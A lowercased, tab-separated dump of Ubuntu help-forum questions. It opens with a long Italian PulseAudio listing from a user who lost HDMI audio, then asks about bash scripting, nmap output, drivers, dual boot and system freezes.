module.author = `` lennart poettering '' module.description = `` augment the property sets of streams with additional static information '' module.version = `` 4.0 '' modulo # 4 nome : module-switch-on-port-available argomento : contatore utilizzi : n/d proprietà : modulo # 5 nome : module-alsa-card argomento : device_id= '' 1 '' name= '' pci-0000_01_00.1 '' card_name= '' alsa_card.pci-0000_01_00.1 '' namereg_fail=false tsched=yes fixed_latency_range=no ignore_db=no deferred_volume=yes use_ucm=yes card_properties= '' module-udev-detect.discovered=1 '' contatore utilizzi : 0 proprietà : module.author = `` lennart poettering '' module.description = `` alsa card '' module.version = `` 4.0 '' modulo # 6 nome : module-alsa-card argomento : device_id= '' 0 '' name= '' pci-0000_00_14.2 '' card_name= '' alsa_card.pci-0000_00_14.2 '' namereg_fail=false tsched=yes fixed_latency_range=no ignore_db=no deferred_volume=yes use_ucm=yes card_properties= '' module-udev-detect.discovered=1 '' contatore utilizzi : 1 proprietà : module.author = `` lennart poettering '' module.description = `` alsa card '' module.version = `` 4.0 '' modulo # 7 nome : module-udev-detect argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` detect available audio hardware and load matching drivers '' module.version = `` 4.0 '' modulo # 8 nome : module-bluetooth-policy argomento : contatore utilizzi : n/d proprietà : module.author = `` frédéric dalleau '' module.description = `` when a bluetooth sink or source is added , load module-loopback '' module.version = `` 4.0 '' modulo # 9 nome : module-bluetooth-discover argomento : contatore utilizzi : n/d proprietà : module.author = `` joao paulo rechi vita '' module.description = `` detect available bluetooth audio devices and load bluetooth audio drivers '' module.version = `` 4.0 '' modulo # 10 nome : module-native-protocol-unix argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` native protocol ( unix sockets ) '' module.version = `` 4.0 '' modulo # 11 nome : module-default-device-restore argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` automatically restore the default sink and source '' module.version = `` 4.0 '' modulo # 12 nome : module-rescue-streams argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` when a sink/source is removed , try to move their streams to the default sink/source '' module.version = `` 4.0 '' modulo # 13 nome : module-always-sink argomento : contatore utilizzi : n/d proprietà : module.author = `` colin guthrie '' module.description = `` mantiene sempre almeno un sink caricato anche se è nullo '' module.version = `` 4.0 '' modulo # 14 nome : module-intended-roles argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` automatically set device of streams based of intended roles of devices '' module.version = `` 4.0 '' modulo # 15 nome : module-suspend-on-idle argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` when a sink/source is idle for too long , suspend it '' module.version = `` 4.0 '' modulo # 16 nome : module-systemd-login argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` create a client for each login session of this user '' module.version = `` 4.0 '' modulo # 17 nome : module-position-event-sounds argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` position event sounds between l and r depending on the position on screen of the widget triggering them . '' module.version = `` 4.0 '' modulo # 18 nome : module-filter-heuristics argomento : contatore utilizzi : n/d proprietà : module.author = `` colin guthrie '' module.description = `` detect when various filters are desirable '' module.version = `` 4.0 '' modulo # 19 nome : module-filter-apply argomento : contatore utilizzi : n/d proprietà : module.author = `` colin guthrie '' module.description = `` load filter sinks automatically when needed '' module.version = `` 4.0 '' sink # 0 stato : suspended nome : alsa_output.pci-0000_01_00.1.hdmi-stereo descrizione : rv670/680 hdmi audio [ radeon hd 3690/3800 series ] stereo digitale ( hdmi ) driver : module-alsa-card.c specifica di campionamento : s16le ch 2 44100 hz mappa dei canali : front-left , front-right modulo di appartenenza : 5 muto : no volume : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db bilanciamento 0,00 volume base : 100 % 0,00 db monitor del sink : alsa_output.pci-0000_01_00.1.hdmi-stereo.monitor latenza : 0 microsec , configurata 0 microsec flag : hardware decibel_volume latency set_formats proprietà : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` hdmi 0 '' alsa.id = `` hdmi 0 '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 3 '' alsa.card = `` 1 '' alsa.card_name = `` hda ati hdmi '' alsa.long_card_name = `` hda ati hdmi at 0xfbeec000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:01:00.1 '' sysfs.path = `` /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card1 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` advanced micro devices , inc. [ amd/ati ] '' device.product.id = `` aa18 '' device.product.name = `` rv670/680 hdmi audio [ radeon hd 3690/3800 series ] '' device.string = `` hdmi:1 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` hdmi-stereo '' device.profile.description = `` stereo digitale ( hdmi ) '' device.description = `` rv670/680 hdmi audio [ radeon hd 3690/3800 series ] stereo digitale ( hdmi ) '' alsa.mixer_name = `` ati r6xx hdmi '' alsa.components = `` hda:1002aa01,00aa0100,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' porte : hdmi-output-0 : hdmi / displayport ( priority : 5900 , available ) porta attiva : hdmi-output-0 formati : pcm sink # 1 stato : running nome : alsa_output.pci-0000_00_14.2.analog-stereo descrizione : audio interno stereo analogico driver : module-alsa-card.c specifica di campionamento : s16le ch 2 48000 hz mappa dei canali : front-left , front-right modulo di appartenenza : 6 muto : yes volume : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db bilanciamento 0,00 volume base : 100 % 0,00 db monitor del sink : alsa_output.pci-0000_00_14.2.analog-stereo.monitor latenza : 77468 microsec , configurata 90000 microsec flag : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency proprietà : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc883 analog '' alsa.id = `` alc883 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda ati sb '' alsa.long_card_name = `` hda ati sb at 0xfbdf4000 irq 16 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:14.2 '' sysfs.path = `` /devices/pci0000:00/0000:00:14.2/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` advanced micro devices , inc. [ amd/ati ] '' device.product.id = `` 4383 '' device.product.name = `` m3a78-eh motherboard '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` stereo analogico '' device.description = `` audio interno stereo analogico '' alsa.mixer_name = `` realtek alc883 '' alsa.components = `` hda:10ec0883,1043829f,00100002 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' porte : analog-output : uscita analogica ( priority : 9900 ) analog-output-headphones : cuffie analogiche ( priority : 9000 , not available ) porta attiva : analog-output formati : pcm sorgente # 0 stato : suspended nome : alsa_output.pci-0000_01_00.1.hdmi-stereo.monitor descrizione : monitor of rv670/680 hdmi audio [ radeon hd 3690/3800 series ] stereo digitale ( hdmi ) driver : module-alsa-card.c specifica di campionamento : s16le ch 2 44100 hz mappa dei canali : front-left , front-right modulo di appartenenza : 5 muto : no volume : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db bilanciamento 0,00 volume base : 100 % 0,00 db monitor del sink : alsa_output.pci-0000_01_00.1.hdmi-stereo latenza : 0 microsec , configurata 0 microsec flag : decibel_volume latency proprietà : device.description = `` monitor of rv670/680 hdmi audio [ radeon hd 3690/3800 series ] stereo digitale ( hdmi ) '' device.class = `` monitor '' alsa.card = `` 1 '' alsa.card_name = `` hda ati hdmi '' alsa.long_card_name = `` hda ati hdmi at 0xfbeec000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:01:00.1 '' sysfs.path = `` /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card1 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` advanced micro devices , inc. [ amd/ati ] '' device.product.id = `` aa18 '' device.product.name = `` rv670/680 hdmi audio [ radeon hd 3690/3800 series ] '' device.string = `` 1 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' formati : pcm sorgente # 1 stato : idle nome : alsa_output.pci-0000_00_14.2.analog-stereo.monitor descrizione : monitor of audio interno stereo analogico driver : module-alsa-card.c specifica di campionamento : s16le ch 2 44100 hz mappa dei canali : front-left , front-right modulo di appartenenza : 6 muto : no volume : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db bilanciamento 0,00 volume base : 100 % 0,00 db monitor del sink : alsa_output.pci-0000_00_14.2.analog-stereo latenza : 0 microsec , configurata 341333 microsec flag : decibel_volume latency proprietà : device.description = `` monitor of audio interno stereo analogico '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` hda ati sb '' alsa.long_card_name = `` hda ati sb at 0xfbdf4000 irq 16 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:14.2 '' sysfs.path = `` /devices/pci0000:00/0000:00:14.2/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` advanced micro devices , inc. [ amd/ati ] '' device.product.id = `` 4383 '' device.product.name = `` m3a78-eh motherboard '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' formati : pcm sorgente # 2 stato : suspended nome : alsa_input.pci-0000_00_14.2.analog-stereo descrizione : audio interno stereo analogico driver : module-alsa-card.c specifica di campionamento : s16le ch 2 44100 hz mappa dei canali : front-left , front-right modulo di appartenenza : 6 muto : no volume : 0 : 100 % 1 : 100 % 0 : 0,08 db 1 : 0,08 db bilanciamento 0,00 volume base : 8 % -64,50 db monitor del sink : n/d latenza : 0 microsec , configurata 0 microsec flag : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency proprietà : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc883 analog '' alsa.id = `` alc883 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda ati sb '' alsa.long_card_name = `` hda ati sb at 0xfbdf4000 irq 16 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:14.2 '' sysfs.path = `` /devices/pci0000:00/0000:00:14.2/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` advanced micro devices , inc. [ amd/ati ] '' device.product.id = `` 4383 '' device.product.name = `` m3a78-eh motherboard '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` stereo analogico '' device.description = `` audio interno stereo analogico '' alsa.mixer_name = `` realtek alc883 '' alsa.components = `` hda:10ec0883,1043829f,00100002 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' porte : analog-input-microphone-front : microfono anteriore ( priority : 8500 , not available ) analog-input-microphone-rear : microfono posteriore ( priority : 8200 , not available ) analog-input-linein : line in ( priority : 8100 , not available ) porta attiva : analog-input-linein formati : pcm input destinazione # 6 driver : protocol-native.c modulo proprietario : 10 client : 12 destinazione : 1 specifiche campione : s16le ch 2 48000 hz mappa canali : front-left , front-right formato : pcm , format.sample_format = `` \ '' s16le\ '' '' format.channels = `` 2 '' format.rate = `` 48000 '' format.channel_map = `` \ '' front-left , front-right\ '' '' in pausa : no silenzioso : no volume : 0 : 94 % 1 : 94 % 0 : -1,61 db 1 : -1,61 db bilanciamento 0,00 latenza buffer : 101416 usec latenza destinazione : 73535 usec metodo di ricampionamento : n/d proprietà : media.name = `` playback stream '' application.name = `` parole media player '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' media.role = `` video '' application.process.id = `` 2838 '' application.process.user = `` matteo '' application.process.host = `` fissoub '' application.process.binary = `` parole '' application.language = `` it_it.utf-8 '' window.x11.display = `` :0.0 '' application.process.machine_id = `` 15f92398f98ecd0169b40ca053af01a8 '' application.process.session_id = `` c2 '' application.icon_name = `` parole '' module-stream-restore.id = `` sink-input-by-media-role : video '' client # 0 driver : module-systemd-login.c modulo di appartenenza : 16 proprietà : application.name = `` login session c2 '' systemd-login.session = `` c2 '' client # 1 driver : protocol-native.c modulo di appartenenza : 10 proprietà : application.name = `` firefox '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.icon_name = `` firefox '' application.version = `` 32.0 '' application.process.id = `` 2401 '' application.process.user = `` matteo '' application.process.host = `` fissoub '' application.process.binary = `` firefox '' application.language = `` it_it.utf-8 '' window.x11.display = `` :0.0 '' application.process.machine_id = `` 15f92398f98ecd0169b40ca053af01a8 '' application.process.session_id = `` c2 '' client # 2 driver : protocol-native.c modulo di appartenenza : 10 proprietà : application.name = `` ubuntu audio settings '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.id = `` com.canonical.settings.sound '' application.icon_name = `` multimedia-volume-control '' application.version = `` 0.1 '' application.process.id = `` 2056 '' application.process.user = `` matteo '' application.process.host = `` fissoub '' application.process.binary = `` indicator-sound-service '' application.language = `` it_it.utf-8 '' window.x11.display = `` :0.0 '' application.process.machine_id = `` 15f92398f98ecd0169b40ca053af01a8 '' application.process.session_id = `` c2 '' client # 12 driver : protocol-native.c modulo di appartenenza : 10 proprietà : application.name = `` parole media player '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' media.role = `` video '' application.process.id = `` 2838 '' application.process.user = `` matteo '' application.process.host = `` fissoub '' application.process.binary = `` parole '' application.language = `` it_it.utf-8 '' window.x11.display = `` :0.0 '' application.process.machine_id = `` 15f92398f98ecd0169b40ca053af01a8 '' application.process.session_id = `` c2 '' application.icon_name = `` parole '' client # 13 driver : protocol-native.c modulo di appartenenza : 10 proprietà : application.name = `` pactl '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.process.id = `` 2969 '' application.process.user = `` matteo '' application.process.host = `` fissoub '' application.process.binary = `` pactl '' application.language = `` it_it.utf-8 '' window.x11.display = `` :0.0 '' application.process.machine_id = `` 15f92398f98ecd0169b40ca053af01a8 '' application.process.session_id = `` c2 '' scheda # 0 nome : alsa_card.pci-0000_01_00.1 driver : module-alsa-card.c modulo di appartenenza : 5 proprietà : alsa.card = `` 1 '' alsa.card_name = `` hda ati hdmi '' alsa.long_card_name = `` hda ati hdmi at 0xfbeec000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:01:00.1 '' sysfs.path = `` /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card1 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` advanced micro devices , inc. [ amd/ati ] '' device.product.id = `` aa18 '' device.product.name = `` rv670/680 hdmi audio [ radeon hd 3690/3800 series ] '' device.string = `` 1 '' device.description = `` rv670/680 hdmi audio [ radeon hd 3690/3800 series ] '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' profili : output : hdmi-stereo : stereo digitale ( hdmi ) output ( sinks : 1 , sources : 0 , priority . 5400 ) off : spento ( sinks : 0 , sources : 0 , priority . 0 ) profilo attivo : output : hdmi-stereo porte : hdmi-output-0 : hdmi / displayport ( priority : 5900 , latency offset : 0 usec , available ) proprietà : device.icon_name = `` video-display '' parte dei profili : output : hdmi-stereo scheda # 1 nome : alsa_card.pci-0000_00_14.2 driver : module-alsa-card.c modulo di appartenenza : 6 proprietà : alsa.card = `` 0 '' alsa.card_name = `` hda ati sb '' alsa.long_card_name = `` hda ati sb at 0xfbdf4000 irq 16 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:14.2 '' sysfs.path = `` /devices/pci0000:00/0000:00:14.2/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 1002 '' device.vendor.name = `` advanced micro devices , inc. [ amd/ati ] '' device.product.id = `` 4383 '' device.product.name = `` m3a78-eh motherboard '' device.form_factor = `` internal '' device.string = `` 0 '' device.description = `` audio interno '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' profili : input : analog-stereo : stereo analogico input ( sinks : 0 , sources : 1 , priority . 60 ) output : analog-stereo : stereo analogico output ( sinks : 1 , sources : 0 , priority . 6000 ) output : analog-stereo+input : analog-stereo : duplex stereo analogico ( sinks : 1 , sources : 1 , priority . 6060 ) output : analog-surround-40 : surround analogico 4.0 output ( sinks : 1 , sources : 0 , priority . 700 ) output : analog-surround-40+input : analog-stereo : surround analogico 4.0 output + stereo analogico input ( sinks : 1 , sources : 1 , priority . 760 ) output : analog-surround-41 : surround analogico 4.1 output ( sinks : 1 , sources : 0 , priority . 800 ) output : analog-surround-41+input : analog-stereo : surround analogico 4.1 output + stereo analogico input ( sinks : 1 , sources : 1 , priority . 860 ) output : analog-surround-50 : surround analogico 5.0 output ( sinks : 1 , sources : 0 , priority . 700 ) output : analog-surround-50+input : analog-stereo : surround analogico 5.0 output + stereo analogico input ( sinks : 1 , sources : 1 , priority . 760 ) output : analog-surround-51 : surround analogico 5.1 output ( sinks : 1 , sources : 0 , priority . 800 ) output : analog-surround-51+input : analog-stereo : surround analogico 5.1 output + stereo analogico input ( sinks : 1 , sources : 1 , priority . 860 ) output : analog-surround-71 : analog surround 7.1 output ( sinks : 1 , sources : 0 , priority . 700 ) output : analog-surround-71+input : analog-stereo : analog surround 7.1 output + stereo analogico input ( sinks : 1 , sources : 1 , priority . 760 ) output : iec958-stereo : stereo digitale ( iec958 ) output ( sinks : 1 , sources : 0 , priority . 5500 ) output : iec958-stereo+input : analog-stereo : stereo digitale ( iec958 ) output + stereo analogico input ( sinks : 1 , sources : 1 , priority . 5560 ) off : spento ( sinks : 0 , sources : 0 , priority . 0 ) profilo attivo : output : analog-stereo+input : analog-stereo porte : analog-input-microphone-front : microfono anteriore ( priority : 8500 , latency offset : 0 usec , not available ) proprietà : device.icon_name = `` audio-input-microphone '' parte dei profili : input : analog-stereo , output : analog-stereo+input : analog-stereo , output : analog-surround-40+input : analog-stereo , output : analog-surround-41+input : analog-stereo , output : analog-surround-50+input : analog-stereo , output : analog-surround-51+input : analog-stereo , output : analog-surround-71+input : analog-stereo , output : iec958-stereo+input : analog-stereo analog-input-microphone-rear : microfono posteriore ( priority : 8200 , latency offset : 0 usec , not available ) proprietà : device.icon_name = `` audio-input-microphone '' parte dei profili : input : analog-stereo , output : analog-stereo+input : analog-stereo , output : analog-surround-40+input : analog-stereo , output : analog-surround-41+input : analog-stereo , output : analog-surround-50+input : analog-stereo , output : analog-surround-51+input : analog-stereo , output : analog-surround-71+input : analog-stereo , output : iec958-stereo+input : analog-stereo analog-input-linein : line in ( priority : 8100 , latency offset : 0 usec , not available ) parte dei profili : input : analog-stereo , output : analog-stereo+input : analog-stereo , output : analog-surround-40+input : analog-stereo , output : analog-surround-41+input : analog-stereo , output : analog-surround-50+input : analog-stereo , output : analog-surround-51+input : analog-stereo , output : analog-surround-71+input : analog-stereo , output : iec958-stereo+input : analog-stereo analog-output : uscita analogica ( priority : 9900 , latency offset : 0 usec ) parte dei profili : output : analog-stereo , output : analog-stereo+input : analog-stereo , output : analog-surround-40 , output : analog-surround-40+input : analog-stereo , output : analog-surround-41 , output : analog-surround-41+input : analog-stereo , output : analog-surround-50 , output : analog-surround-50+input : analog-stereo , output : analog-surround-51 , output : analog-surround-51+input : analog-stereo , output : analog-surround-71 , output : analog-surround-71+input : analog-stereo analog-output-headphones : cuffie analogiche ( priority : 9000 , latency offset : 0 usec , not available ) proprietà : device.icon_name = `` audio-headphones '' parte dei profili : output : analog-stereo , output : analog-stereo+input : analog-stereo iec958-stereo-output : output digitale ( s/pdif ) ( priority : 0 , latency offset : 0 usec ) parte dei profili : output : iec958-stereo , output : iec958-stereo+input : analog-stereo in the audio mixer ( hdmi0 alsa ) i 've got no volume level to set ( for hdmi ) only a checkbox : iec958 ( checked ) . here is pulseaudio -- dump-conf # # # lettura dal file di configurazione : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-4.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 is there something wrong or i can do something to get back the audio working ? ps : sorry if the post is very big ... but i tried to give you more info possible ...
521662	shell script problem	i decided to make a shell script for basic nmap scanning so i did it like this : # ! /bin/bash sudo apt-get install nmap printf `` enter the name of site to do basic scan on > > > '' read name nmap $ name echo `` do you wish to do software version scan ? '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) goto 17 ; break ; ; no ) exit ; ; nmap $ name -sv echo `` do you wish to do os scan ? '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) goto 25 ; break ; ; no ) exit ; ; nmap $ name -o but the output was : nmap done : 1 ip address ( 1 host up ) scanned in 109.97 seconds do you wish to do software version scan ? ./nmap-basic.sh : line 17 : syntax error near unexpected token ` $ name' ./nmap-basic.sh : line 17 : `nmap $ name -sv' any solutions ? ? : d
521665	ubuntu and lubuntu dual desktop . now want to go back to old login screen	i installed both lubuntu and ubuntu and lubuntu 's login screen took over . however the ubuntu login screen looks better . how do i get to the old login screen ? ( i did a complete removal on every lubuntu package installed using synaptic )
521673	wait for job in bash script	find /var/www/ -ipath */logs/access.log.gz -execdir mv `` { } '' `` old/`date +\ % g-\ % m-\ % d`-access.log.gz '' \ ; wait service nginx reload wait python /var/www/default/piwik/misc/log-analytics/import_logs.py -- url=blablabla the wait command is n't respected.. should i add the pid of the processes to make it work ? nginx gets reloaded before the mv and the python script runs before nginx is reloaded ...
521674	wobbly windows in xubuntu 14.04	i tried to install compiz on xubuntu 14.04 and changed the desktop to unity . as i open the compiz it shows `` some features might not be available '' and i am not able to see any option of wobbly windows ... kindly help me regarding this .
521675	citrix receiver freeze when is screen is locked	whenever the screen is locked by the remote session ( here windows ) within the citrix receiver ( full screen ) the local keyboard freezes . the mouse is still working properly , but the keyboard do n't react . sometimes although , a few keys might be active . the citrix session remains in full screen , and the only active element is where i am supposed to enter the windows password to the remote session . since my keyboard is not working , i am locked . not even the workplace switcher ( ctrl + alt + left/right/up/down ) or the alt+ctrl+delete is working . the only way to get free of this situation seems to be cutting the power . citrix receiver 13.0 installed on ubuntu 14.04 . citrix was installed according to https : //help.ubuntu.com/community/citrixicaclienthowto . i have tried to logon via ssh from another computer . the ssh-session remain in good shape even when the citrix receiver locks . the top command show nothing extraordinary as fas as i can see . the wfica process is running smoothly . i can kill it with [ sudo kill xxxx ] , and then the citrix session ( off cause ) disappear . now firefox , from where the citrix session was initiated , is normal , and so is the rest of ubuntu and running programs . the screen is locked on two cases : when i activate the `` lock screen '' in the remote desktop ( i could possible avoid that ) , and when no activity has been for a couple of minutes . ( that 's harder to avoid ) . any ideas ?
521676	wifi stops working after i close laptop . macbook pro + ubuntu 14.04	without fail , i boot into ubuntu and everything is working , but after closing the laptop the wifi stops working . when i restart everything works again . running iwconfig , before restarting , gives me this : wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : on i am very new to ubuntu , so any help will be very appreciated ! macbook pro ( retina , mid 2014 )
521677	special variables in bash	i know these are few special variable used by bash . but i am not able to understand it . can anyone explain me what are these variable and how to use it ? $ * $ @ $ #
521684	difference between ssl/https and plain https in nmap output	i 'm trying to analyze the behavior of ips that operate as free wifi hotspots . nmap -sv reports the following for two different hosts : port state service version 443/tcp open ssl/https ? port state service version 443/tcp open https ? why does one show up as ssl/https ? while the other is just https ? ?
521685	default system language issue	my default language is polish . sometimes when system loads , when i try to search something in web browser using polish letters ( ąężźśćółń ) i activate keyboard shortcuts ( like normally alt+a should give ą but it does something else , for ex . selects all text in site ) . if i change language to english and to polish again ( using language button [ pl ] in this image ) everything works correctly . browser is just an example , in steam chat i have similar problem until i change to en and reselect pl .
521687	firefox `` email link '' does n't give thunderbird window focus	ubuntu 14.04 ff 32.0 thunderbird 31.0 when on a web page , one can perform file -- email link . ever since upgrade to ubuntu 14.04 , firefox will send the link to thunderbird , but will not give the new email window the focus to finish the email . any ideas ?
521688	no login page - stopps on a splash	couple a days ago i upgraded to 14.04 . all was working fine until i decided to check nvidia propietary drivers via system - > software+updates - > additional drivers . after i rebooted the system stopped on ubuntu splash with no possibility to see login page . i tried many things . all with no result : i changed xorg.conf with the last working backup . i even rebooted with no xorg.conf and without any nvidia driver nvidia driver was completly removedapt-get remove -- purge nvidia* i tried to use recovery mode to launch falisafex . it said that your screen , graphic card and input device settings could not be dettected correctly . you will need to configure these yourself , so next i selected safe graphic mode , it said to wait and ... nothing happend . i added ppa sudo add-apt-repository -y ppa : xorg-edgers/ppa and installed nvidia-current i also applied to what is written https : //wiki.ubuntu.com/x/config/hybridgraphics # a14.04-1 i have asus ul80vt with 2 graphic cards 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) subsystem : asustek computer inc. device 1bc2 kernel driver in use : i915 -- 01:00.0 vga compatible controller : nvidia corporation gt218m [ geforce g210m ] ( rev a2 ) subsystem : asustek computer inc. device 1bc2 kernel driver in use : nouveau can any one suggest something elese ?
521690	dual boot manager : windows boot manager does not work	i first had windows 8.1 already installed on my machine , and then i decided to install ubuntu 14.04 lts as well . i first shrunk the size of my windows disk . then i installed ubuntu , splitting it into two partitions ( one for swap and the other for the ubuntu file system ) . however , now whenever i attempt to boot via windows boot manager ( on/dev/sda2 ) , i get the following error message : /endentire file path : /acpi ( a0341d0,0 ) /pci ( 2,1f ) /sata ( 0,0,0 ) /hd ( 2,1f4800,82000,0f6afd19c5af524e,2,2 ) /file ( \efi\microsoft\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . how would i fix it so that windows 8.1 can boot again as well ?
521691	new install of xubuntu 14.04 crashes overnight after a few days uptime , how to diagnose ?	i recently installed xubuntu 14.04.1 on a computer that previously ran ubuntu 10.04 . the machine was completely stable while running 10.04 and would run for weeks or months without reboot , so i think i can rule out hardware problems , right ? since installing 14.04.1 , it has crashed twice over the last two weekends . when i come into the office on a monday morning , the machine is completely unresponsive , not even to reisub . only a hard reset is possible . i can not find anything in the logs . in syslog , there are fairly harmless looking warnings , cron reports , etc . every hour or so , showing that the machine was still alive . then they just stop . for the latest crash , the last message in syslog is this : sep 7 04:43:53 zooey avahi-daemon [ 857 ] : invalid response packet from host < ip_address > . sep 7 04:43:53 zooey avahi-daemon [ 857 ] : invalid response packet from host < mac_address > . but similar errors had been occurring every 50 minutes in the log prior to the crash , so i doubt that has anything to do with it . are there any other log files i should be looking at ? any ideas ? thanks in advance .
521693	nvidia geforce 210 xubuntu 14.04	my beloved old graphics card died , and a dirt cheap replacement had to be found for my business pc . this was done in the form of a geforce 210 which at this time is so old that it should be compatible with my phone . so after getting the package i installed it and that is where things went strange . right after installation and boot-up only one monitor turned on and depending on which output was connected the resolution differed : using the dvi output i get a resolution of 1280x1024 @ 77hz using the vga output i get a resolution of 800x640 @ 64hz these are both the max and min supported resolutions of the monitor . -- > xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1280 x 1024 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 0mm x 0mm 1280x1024 77.0* which is strange because there is no mention of the other monitor that is physically connected to the machine . that was cause for concern so i checked what lspci had to say about the matter . this is the output : -- > sudo lspci -vnn | grep -i vga -a 12 [ sudo ] password for dejan : 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218 [ geforce 210 ] [ 10de:0a65 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : evga.com . corp. device [ 3842:1313 ] flags : bus master , fast devsel , latency 0 , irq 10 memory at fb000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f8000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at ec00 [ size=128 ] expansion rom at faf80000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 